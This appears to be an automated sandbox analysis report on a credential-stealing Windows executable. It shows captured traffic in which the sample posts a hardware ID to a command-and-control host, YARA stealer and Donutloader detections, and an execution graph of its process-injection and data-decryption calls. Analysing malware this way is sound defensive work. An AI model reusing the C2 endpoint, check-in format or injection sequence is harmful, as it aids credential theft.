                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 41 53 52 9a 44 6e 31 06 f7 02 73 d4 99 be 07 e4 6a 63 3c de e1 1d c3 57 19 7b 47 9f 86 1e 39 1c 9b 34 5e d5 85 01 8d 3f a1 b8 f2 39 b9 80 3f e0 1b ef 8f ff d3 4d c1 37 9b f7 98 e1 19 5f 87 ba a0 75 f7 77 17 35 fd 68 f6 dc 6f d6 7f 44 54 b9 9f fb 78 2f 75 fb 36 ab 3a fe fb 30 fe ce c2 50 61 ee 58 a6 17 e3 c4 dc 25 65 fe 16 a8 23 ef f7 ca 88 d2 15 d6 45 66 f2 d2 f2 7c eb 79 76 47 a7 da 7d 81 44 01 b0 ad e5 5e 2b 3f 23 a2 b6 7b e4 ff c3 d4 9b c7 43 bd 86 ff ff f7 7b 16 33 c6 32 43 f6 75 a4 4d 11 a5 c5 12 33 54 38 47 8b 52 21 61 a4 50 b6 91 7d 9d b1 c5 29 a1 d3 42 65 99 56 8a ac 91 14 c6 52 14 a1 ec fb d8 f7 7d 19 cc f6 9b ce e7 fb f9 7e 7f ff 54 f4 60 b6 eb be ae eb f5 7c dd f7 75 87 94 5d bf 08 ee cf af cc 6d fe 72 06 81 df ce ae b8 78 b3 63 6d 44 70 10 79
                Data Ascii: ASRDn1sjc<W{G94^?9?M7_uw5hoDTx/u6:0PaX%e#Ef|yvG}D^+?#{C{32CuM3T8GR!aP})BeVR}~T`|u]mrxcmDpy
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: b5 a1 7e 86 b4 f9 bb 64 2d aa 0e d2 1f e1 eb bb a5 36 fa b2 f5 ac 5d 38 22 34 f4 12 f4 82 af 5d fe 89 6b 02 d7 66 a5 3d e8 ee 08 01 90 7a 27 23 9b ae 0f d3 35 89 ec 9e cf fe ca 77 61 7a 56 b3 59 ee cf f2 0c ce ea 82 35 b7 ec df da a0 f7 2f 17 10 3e 61 55 81 ae 9d 11 37 ed 74 39 96 a6 5c b9 d4 9a 73 eb 37 db 64 0a 55 a5 cc 14 b0 98 94 0f 1d 6a 7a 69 fc 32 af 84 b5 eb fa 82 e0 09 f7 9e 58 a6 fd 87 6b 7c c4 20 fe e2 51 df a0 18 95 71 42 7f c3 bf b8 8b 3c 77 bb e9 5a 95 7d f7 d6 09 38 dd 9f 98 df 5a ac 28 0b 1e 97 c0 e0 e4 7b 62 32 0a c5 df c4 80 3f 9c ab d7 5e 6b 7a bb 01 1a 36 fb 71 22 e7 f2 d7 68 7e 4d d2 31 cf 3f f1 12 8a 50 14 5a 4c c4 93 45 fb a9 cf 7c 9e 13 11 9e 95 b4 9e 2f ef 45 31 30 74 c5 0c 95 df 9e 3f 3c f9 69 1f 99 d1 13 50 8e 93 36 79 6e c6 63
                Data Ascii: ~d-6]8"4]kf=z'#5wazVY5/>aU7t9\s7dUjzi2Xk| QqB<wZ}8Z({b2?^kz6q"h~M1?PZLE|/E10t?<iP6ync
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 97 06 98 ad 78 af 23 02 c4 58 61 3c 0e f6 32 8c ee 61 07 e8 1f 07 c3 f5 6d 3f 7a da ad cf 16 35 3b b7 4e 68 28 1d 45 ff 9f 41 1e 3a ba 72 91 7c b8 3a 0b 48 fb 36 3a 45 85 cf 5c 02 3a 7b b5 8e fe 05 48 41 21 8b ce 9a 91 f4 83 de 19 f3 6b b8 c5 a7 5f cc 76 48 dd 6d 3c b1 a3 2b a2 32 c8 e6 88 16 a1 93 06 8f a4 46 82 48 6a 04 88 e5 ba bd 2c 1d bd 85 42 68 da 3e 88 aa 34 6f 91 f9 b2 2b db ae e2 48 b6 9d 5c 47 f8 07 bd ec 2b 1b c1 0f 6c b1 2d 89 16 f9 83 50 35 1a 58 e6 9f bd 50 3e f9 1e cd 19 3e 00 a3 37 5d 30 57 f8 78 14 b8 23 79 7c a2 ff ec 43 da 9f e9 47 d4 5e 21 f0 38 a2 e2 12 48 ca cf 7b 74 19 22 2a 58 12 f9 7f 57 57 8a 4f 5a 9d a5 56 49 80 9c 30 4e cc 8e 55 4b 88 fd a8 8a 10 79 2c c4 e3 39 69 5a 56 88 97 15 ac af bb 88 82 04 8c 39 99 86 b6 fc de fa 23 2d
                Data Ascii: x#Xa<2am?z5;Nh(EA:r|:H6:E\:{HA!k_vHm<+2FHj,Bh>4o+H\G+l-P5XP>>7]0Wx#y|CG^!8H{t"*XWWOZVI0NUKy,9iZV9#-
                2024-07-02 06:33:03 UTC | 804 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:03 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=5o2fs9hbm952q1j0qhc27qu568; expires=Sat, 26-Oct-2024 00:19:42 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lns8MVWci9z3646IhDNKdKIUnrF6wDmjLBu64OvY%2BSbn14nPW2nTB74b42iAAXFR14YYXVWma4Ef12uVJUGeegXIxATvoMExqdTN6Z9YYXFEWLkxEfuAJGE175XdHuXDSK5IEhAUXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a194f940cb0-EWR
                alt-svc: h3=":443"; ma=86400


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.5 | 49724 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:33:04 UTC | 268 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 77
                Host: contintnetksows.shop
                2024-07-02 06:33:04 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 53 31 5a 72 6c 48 2d 2d 26 6a 3d 26 68 77 69 64 3d 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31
                Data Ascii: act=get_message&ver=4.0&lid=S1ZrlH--&j=&hwid=1440C7F4F4D84ED7471BB206B02395B1
                2024-07-02 06:33:04 UTC | 812 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:04 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=vvaakkv2djjieei82ug5iq1urt; expires=Sat, 26-Oct-2024 00:19:43 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BeDuDQLsREOI%2FejauWYmPl7h%2FtRGyPg1usxEnKByjYG2KWsUSUGgds7LtSac94FNwiRvYR%2BNuEYGLvwMO919mvOgLPEU2Sl%2BMywM6GjxBDuBvEnxfEjgud%2F6O2iHU1CxzyHUS4LrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a2b4dff1871-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:33:04 UTC | 54 | IN | Data Raw: 33 30 0d 0a 35 35 75 35 72 57 69 57 68 31 63 6f 4b 66 77 58 47 77 36 64 37 6c 59 59 73 79 63 34 75 79 56 53 43 76 72 53 4d 50 6c 64 4e 39 53 38 78 67 3d 3d 0d 0a
                Data Ascii: 3055u5rWiWh1coKfwXGw6d7lYYsyc4uyVSCvrSMPldN9S8xg==
                2024-07-02 06:33:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Target ID:0
                Start time:02:32:40
                Start date:02/07/2024
                Path:C:\Users\user\Desktop\6RVmzn1DzL.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\6RVmzn1DzL.exe"
                Imagebase:0x620000
                File size:587'168 bytes
                MD5 hash:4D73427DC0B9F3DC4B846ACE0DDC2DEB
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173115481.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172101207.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172144861.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173067791.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172193519.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173166393.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172553659.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134170058.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171729321.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172598714.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2147519719.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134331985.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171672150.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171626305.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172650183.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185006913.0000000001259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:02:33:03
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
                Imagebase:0x200000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true


                  Execution Graph

                  Execution Coverage:6.7%
                  Dynamic/Decrypted Code Coverage:68.1%
                  Signature Coverage:20.7%
                  Total number of Nodes:511
                  Total number of Limit Nodes:37
                  execution_graph 39670 31d1f9d 39672 31d1fa8 39670->39672 39671 31d2046 39672->39671 39674 3205f22 RtlAllocateHeap 39672->39674 39675 6227e6 39676 6227f6 39675->39676 39677 6229b9 ImageList_Draw SetWindowLongW 39675->39677 39678 6229a4 39676->39678 39679 6227ff 39676->39679 39680 622893 39677->39680 39678->39680 39681 6229ad 39678->39681 39682 622808 39679->39682 39686 622905 39679->39686 39751 622775 29 API calls 39681->39751 39684 622813 39682->39684 39685 6228f8 39682->39685 39687 622816 39684->39687 39688 62286d 39684->39688 39750 621474 48 API calls 39685->39750 39686->39680 39696 622936 SetBkMode 39686->39696 39692 622841 39687->39692 39694 62281a 39687->39694 39690 622877 39688->39690 39691 6228e8 EndDialog 39688->39691 39693 62287c 39690->39693 39699 6228ce 39690->39699 39691->39680 39692->39680 39695 62284b GetWindowLongW 39692->39695 39700 6228b2 39693->39700 39701 622881 39693->39701 39694->39680 39702 622831 39694->39702 39695->39680 39703 62285e 39695->39703 39697 622957 ImageList_Draw SetBkMode SetWindowLongW 39696->39697 39698 622954 39696->39698 39697->39680 39698->39697 39699->39680 39713 6223af GetDlgItemTextW 39699->39713 39700->39680 39749 622145 27 API calls TranslatorGuardHandler 39700->39749 39705 622884 39701->39705 39706 622898 39701->39706 39745 6220bd 30 API calls TranslatorGuardHandler 39702->39745 39746 62267f 38 API calls TranslatorGuardHandler 39703->39746 39705->39680 39747 6217f2 63 API calls 39705->39747 39706->39680 39748 6222f7 16 API calls 2 library calls 39706->39748 39709 62283c 39709->39680 39714 622412 GetDlgItemTextW 39713->39714 39715 6223ec 39713->39715 39717 622424 39714->39717 39724 622441 39714->39724 39768 622145 27 API calls TranslatorGuardHandler 39715->39768 39769 6222f7 16 API calls 2 library calls 39717->39769 39718 6223f4 GetDlgItemTextW 39718->39714 39720 622666 39718->39720 39770 62ed28 6 API calls TranslatorGuardHandler 39720->39770 39721 62242b GetDlgItemTextW 39721->39720 39721->39724 39723 
62248b GetFullPathNameW 39723->39720 39727 6224b7 39723->39727 39724->39723 39726 62246f SetDlgItemTextW 39724->39726 39725 622678 39726->39723 39727->39720 39728 6224e4 wsprintfW MessageBoxW 39727->39728 39729 622515 39727->39729 39728->39720 39728->39729 39729->39720 39752 621e09 7 API calls TranslatorGuardHandler 39729->39752 39731 62256e GetDlgItem SendMessageW 39732 62258d 39731->39732 39753 621240 8 API calls TranslatorGuardHandler 39732->39753 39734 6225a1 39754 621ce1 6 API calls TranslatorGuardHandler 39734->39754 39736 6225af _memset 39737 6225ca GetDlgItemTextW 39736->39737 39755 621c65 22 API calls 39737->39755 39739 6225e5 GetWindowLongW 39740 6225fa SetWindowLongW 39739->39740 39741 622608 GetDlgItem SendMessageW 39739->39741 39742 622607 39740->39742 39756 625b9a PathCanonicalizeW 39741->39756 39742->39741 39745->39709 39748->39680 39749->39680 39750->39709 39751->39680 39752->39731 39753->39734 39754->39736 39755->39739 39757 625bdc 39756->39757 39771 62ff0f 47 API calls 3 library calls 39757->39771 39759 625c13 _memset _strncpy 39760 625cb2 39759->39760 39761 625cc3 39759->39761 39788 6413b2 CreateThread 39760->39788 39772 624ff3 39761->39772 39764 625cbc 39765 625cc8 39764->39765 39789 62ed28 6 API calls TranslatorGuardHandler 39765->39789 39767 62264e SetWindowLongW SetTimer 39767->39720 39768->39718 39769->39721 39770->39725 39771->39759 39773 62503f 39772->39773 39778 6250d1 39773->39778 39787 625154 39773->39787 39817 62ff0f 47 API calls 3 library calls 39773->39817 39776 62518e 39776->39765 39777 6250b4 39818 629e34 68 API calls TranslatorGuardHandler 39777->39818 39790 627f26 6 API calls 2 library calls 39778->39790 39780 625126 39791 6240f9 39780->39791 39785 62513c 39786 624f32 152 API calls 39785->39786 39786->39787 39819 62ed28 6 API calls TranslatorGuardHandler 39787->39819 39788->39764 39789->39767 39790->39780 39792 62410f 39791->39792 39793 6242fa GetProcAddress 39792->39793 39794 624326 39793->39794 39795 624959 VirtualAlloc 
39794->39795 39798 6249ad 39795->39798 39797 624d41 39799 624e14 39797->39799 39821 62e317 49 API calls 39797->39821 39820 627a0d 84 API calls 39798->39820 39799->39799 39824 626c9a 150 API calls 39799->39824 39801 624daa 39803 624db6 39801->39803 39822 623e41 150 API calls TranslatorGuardHandler 39803->39822 39805 624dee 39823 623e41 150 API calls TranslatorGuardHandler 39805->39823 39806 624e3b 39807 624ebd 39806->39807 39825 627a0d 84 API calls 39806->39825 39810 624f15 39807->39810 39827 62e317 49 API calls 39807->39827 39828 62ed28 6 API calls TranslatorGuardHandler 39810->39828 39813 624e99 39826 6274f3 80 API calls 39813->39826 39814 624f29 39816 625ce3 72 API calls TranslatorGuardHandler 39814->39816 39817->39777 39818->39778 39819->39776 39820->39797 39821->39801 39822->39805 39823->39799 39824->39806 39825->39813 39826->39807 39827->39810 39828->39814 39334 31e2916 39335 31e2923 39334->39335 39338 31e8940 39335->39338 39337 31e293d 39339 31e8960 39338->39339 39342 320b1a0 39339->39342 39341 31e89b9 39343 320b1c0 39342->39343 39344 320b30e 39343->39344 39346 3208120 LdrInitializeThunk 39343->39346 39344->39341 39346->39344 39347 31e2f17 39350 31e2f20 39347->39350 39351 31ead10 39350->39351 39352 31ead71 39351->39352 39355 31eaff0 39352->39355 39358 320afe0 39355->39358 39357 31eb049 39360 320b000 39358->39360 39359 320b14e 39359->39357 39360->39359 39362 3208120 LdrInitializeThunk 39360->39362 39362->39359 39363 3207b2c 39364 3207bb1 LoadLibraryExW 39363->39364 39365 3207b6e 39363->39365 39366 3207bbf 39364->39366 39365->39364 39367 31e9f12 39368 31ea023 39367->39368 39371 31e5e60 39368->39371 39372 31e5e80 39371->39372 39372->39372 39373 320afe0 LdrInitializeThunk 39372->39373 39374 31e5f3e 39373->39374 39379 31f060c 39380 31f0794 39379->39380 39383 320b810 39380->39383 39384 320b830 39383->39384 39384->39384 39385 31f07f6 39384->39385 39387 3208120 LdrInitializeThunk 39384->39387 39387->39385 39840 31e828d 39841 31e5e60 LdrInitializeThunk 39840->39841 
39842 31e8299 39841->39842 39843 31e738b 39844 31e73c9 39843->39844 39845 31e5e60 LdrInitializeThunk 39844->39845 39846 31e7438 39845->39846 39847 31e5e60 LdrInitializeThunk 39846->39847 39848 31e7503 39847->39848 39849 31e5e60 LdrInitializeThunk 39848->39849 39850 31e7612 39849->39850 39851 31e5e60 LdrInitializeThunk 39850->39851 39852 31e76d3 39851->39852 39853 31e2087 39854 31e2094 39853->39854 39857 31e61e0 39854->39857 39856 31e20ab 39858 31e6200 39857->39858 39858->39858 39859 320afe0 LdrInitializeThunk 39858->39859 39860 31e63ba 39859->39860 39388 31d2107 39391 31d3060 39388->39391 39392 31d204e 39391->39392 39393 31d3074 39391->39393 39393->39392 39399 3205f22 RtlAllocateHeap 39393->39399 39394 31d30d9 39394->39392 39395 31d32cd 39394->39395 39398 3205f22 RtlAllocateHeap 39394->39398 39395->39392 39397 3206022 RtlFreeHeap 39395->39397 39397->39392 39398->39395 39400 2d904c7 39401 2d904d5 39400->39401 39414 2d90e17 39401->39414 39403 2d9066d GetPEB 39405 2d906ea 39403->39405 39404 2d90628 39404->39403 39412 2d9095b 39404->39412 39417 2d90bd7 39405->39417 39408 2d9074b CreateThread 39409 2d90723 39408->39409 39428 2d90a87 GetPEB 39408->39428 39409->39412 39425 2d910d7 GetPEB 39409->39425 39411 2d90bd7 4 API calls 39411->39412 39413 2d907a5 39413->39411 39413->39412 39426 2d90e37 GetPEB 39414->39426 39416 2d90e24 39416->39404 39418 2d90bed CreateToolhelp32Snapshot 39417->39418 39420 2d9071d 39418->39420 39421 2d90c24 Thread32First 39418->39421 39420->39408 39420->39409 39421->39420 39422 2d90c4b 39421->39422 39422->39420 39423 2d90c82 Wow64SuspendThread 39422->39423 39424 2d90cac FindCloseChangeNotification 39422->39424 39423->39424 39424->39422 39425->39413 39427 2d90e52 39426->39427 39427->39416 39431 2d90ae0 39428->39431 39429 2d90b40 CreateThread 39429->39431 39432 2d912b7 39429->39432 39430 2d90b8d 39431->39429 39431->39430 39433 2d912bd 39432->39433 39435 2d912c7 39433->39435 39436 2d912cf 39435->39436 39436->39436 39439 2ddf2ab 39436->39439 39440 
2ddf3ba 39439->39440 39441 2ddf2d0 39439->39441 39451 2de0586 39440->39451 39472 2de1b2d 39441->39472 39444 2d912eb 39444->39433 39445 2ddf2e8 39445->39444 39446 2de1b2d LoadLibraryA 39445->39446 39447 2ddf32a 39446->39447 39448 2de1b2d LoadLibraryA 39447->39448 39449 2ddf346 39448->39449 39450 2de1b2d LoadLibraryA 39449->39450 39450->39444 39452 2de1b2d LoadLibraryA 39451->39452 39453 2de05a9 39452->39453 39454 2de1b2d LoadLibraryA 39453->39454 39455 2de05c1 39454->39455 39456 2de1b2d LoadLibraryA 39455->39456 39457 2de05df 39456->39457 39458 2de0608 39457->39458 39459 2de05f4 VirtualAlloc 39457->39459 39458->39444 39459->39458 39461 2de0622 39459->39461 39460 2de1b2d LoadLibraryA 39463 2de06a0 39460->39463 39461->39458 39461->39460 39462 2de06f6 39462->39458 39464 2de1b2d LoadLibraryA 39462->39464 39465 2de0758 39462->39465 39463->39458 39463->39462 39476 2de1934 39463->39476 39464->39462 39465->39458 39471 2de07ba 39465->39471 39502 2ddf716 LoadLibraryA 39465->39502 39468 2de07a3 39468->39458 39503 2ddf811 LoadLibraryA 39468->39503 39471->39458 39480 2de0cb6 39471->39480 39473 2de1b44 39472->39473 39474 2de1b6b 39473->39474 39506 2ddfc32 LoadLibraryA 39473->39506 39474->39445 39477 2de1949 39476->39477 39478 2de19bf LoadLibraryA 39477->39478 39479 2de19c9 39477->39479 39478->39479 39479->39463 39481 2de0cf1 39480->39481 39482 2de0d38 NtCreateSection 39481->39482 39483 2de0d5d 39481->39483 39501 2de1365 39481->39501 39482->39483 39482->39501 39484 2de0df2 NtMapViewOfSection 39483->39484 39483->39501 39491 2de0e12 39484->39491 39485 2de113b VirtualAlloc 39496 2de117d 39485->39496 39486 2de1934 LoadLibraryA 39486->39491 39487 2de1934 LoadLibraryA 39488 2de1099 39487->39488 39488->39485 39488->39487 39490 2de1137 39488->39490 39504 2de19d2 LoadLibraryA 39488->39504 39489 2de122e VirtualProtect 39492 2de124e 39489->39492 39493 2de12f9 VirtualProtect 39489->39493 39490->39485 39491->39486 39491->39488 39494 2de19d2 LoadLibraryA 39491->39494 39491->39501 39492->39493 
39500 2de12d3 VirtualProtect 39492->39500 39495 2de1328 39493->39495 39494->39491 39495->39501 39505 2de16e7 LoadLibraryA 39495->39505 39496->39489 39498 2de121b NtMapViewOfSection 39496->39498 39496->39501 39498->39489 39498->39501 39500->39492 39501->39458 39502->39468 39503->39471 39504->39488 39505->39501 39506->39473 39861 62f4c2 39907 6342ba GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 39861->39907 39863 62f4c7 __getstream 39908 63325b GetStartupInfoW 39863->39908 39865 62f4dd 39866 633a58 GetProcessHeap 39865->39866 39867 62f4ed 39866->39867 39868 62f4f8 39867->39868 39869 62f5ae 46 API calls 39867->39869 39870 6339c5 85 API calls 39868->39870 39869->39868 39871 62f4fe 39870->39871 39872 62f509 __RTC_Initialize 39871->39872 39873 62f5ae 46 API calls 39871->39873 39874 633a6d 50 API calls 39872->39874 39873->39872 39875 62f518 39874->39875 39876 62f524 GetCommandLineA 39875->39876 39877 62f5ae 46 API calls 39875->39877 39878 634396 51 API calls 39876->39878 39879 62f523 39877->39879 39880 62f534 39878->39880 39879->39876 39881 633d18 __setargv 73 API calls 39880->39881 39882 62f53e 39881->39882 39883 62f542 39882->39883 39884 62f54a 39882->39884 39885 632bf0 __lock 46 API calls 39883->39885 39886 633f58 72 API calls 39884->39886 39887 62f549 39885->39887 39888 62f54f 39886->39888 39887->39884 39889 62f553 39888->39889 39890 62f55b 39888->39890 39892 632bf0 __lock 46 API calls 39889->39892 39891 632c0a 50 API calls 39890->39891 39894 62f562 39891->39894 39893 62f55a 39892->39893 39893->39890 39895 62f567 39894->39895 39896 62f56e 39894->39896 39897 632bf0 __lock 46 API calls 39895->39897 39898 63441b 72 API calls 39896->39898 39899 62f56d 39897->39899 39900 62f573 39898->39900 39899->39896 39901 622bb3 26 API calls 39900->39901 39902 62f581 39901->39902 39903 632e6b 46 API calls 39902->39903 39904 62f58a 39903->39904 39905 6335fd 46 API calls 39904->39905 39906 62f59b 39905->39906 39907->39863 39909 31d32bc 39914 
3205f22 RtlAllocateHeap 39909->39914 39910 31d32cd 39911 31d32f2 39910->39911 39912 3206022 RtlFreeHeap 39910->39912 39912->39911 39915 3208a85 39916 3208a80 39915->39916 39916->39915 39919 3208a8e 39916->39919 39922 3208120 LdrInitializeThunk 39916->39922 39918 3208b6e 39919->39918 39921 3208120 LdrInitializeThunk 39919->39921 39921->39918 39922->39919 39923 3208085 39924 32080e3 RtlReAllocateHeap 39923->39924 39925 32080ac 39923->39925 39926 320810c 39924->39926 39925->39924 39507 31ef730 39508 31ef742 39507->39508 39511 320b950 39508->39511 39510 31ef770 39513 320b983 39511->39513 39512 320b9ee 39516 320bade 39512->39516 39518 3208120 LdrInitializeThunk 39512->39518 39513->39512 39517 3208120 LdrInitializeThunk 39513->39517 39516->39510 39517->39512 39518->39516 39927 3203d8f 39930 320a3d0 39927->39930 39929 3203db5 GetVolumeInformationW 39931 320a413 39930->39931 39528 31e7829 39531 31e8320 39528->39531 39532 31e83cd 39531->39532 39532->39532 39533 31ead10 LdrInitializeThunk 39532->39533 39534 31e87d9 39533->39534 39936 31f68a1 39938 31f68be 39936->39938 39937 31f699b FreeLibrary 39939 31f69aa 39937->39939 39938->39937 39938->39938 39940 31f69ba GetComputerNameExA 39939->39940 39942 31f6a30 39940->39942 39941 31f6adb GetComputerNameExA 39943 31f6b4b 39941->39943 39942->39941 39942->39942 39545 31fb05f 39548 31df9c0 39545->39548 39547 31fb064 SysAllocString 39548->39547 39947 3207be5 GetLogicalDrives 39948 3207bfa 39947->39948 39949 31e6fd2 39951 31e6fe0 39949->39951 39950 31e7180 CryptUnprotectData 39951->39950 39549 31ea650 39550 31ea65e 39549->39550 39554 31ea6a0 39549->39554 39550->39550 39555 31ea760 39550->39555 39552 31ea71c 39553 31e8af0 LdrInitializeThunk 39552->39553 39552->39554 39553->39554 39556 31ea7bb 39555->39556 39557 320b1a0 LdrInitializeThunk 39556->39557 39558 31ea8bd 39557->39558 39571 31e9a4a 39573 31e9b22 39571->39573 39572 31e5e60 LdrInitializeThunk 39574 31e9b81 39572->39574 39573->39572 39575 31e5e60 LdrInitializeThunk 39574->39575 
